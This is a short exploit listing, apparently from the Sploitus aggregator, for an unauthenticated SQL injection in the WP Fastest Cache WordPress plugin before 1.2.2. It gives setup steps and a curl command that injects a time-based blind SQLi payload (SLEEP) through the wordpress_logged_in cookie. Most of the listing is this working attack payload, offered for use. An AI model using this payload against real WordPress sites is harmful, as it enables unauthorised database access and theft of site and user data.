Sploitus

Exploit for WP Fastest Cache < 1.2.2 - Unauthenticated SQL Injection

wpexploit · 2023-11-13

Exploit Code

MARKDOWN6 lines
## https://sploitus.com/exploit?id=WPEX-ID:30A74105-8ADE-4198-ABE2-1C6F2967443E
1. Visit WP Fastest Cache > Settings. Ensure "Cache System" is enabled, and "Logged-in Users" is disabled. Click "Submit" at the bottom.

2. The following curl command demonstrates the SQLi:

curl https://example.com -H "Cookie: wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts"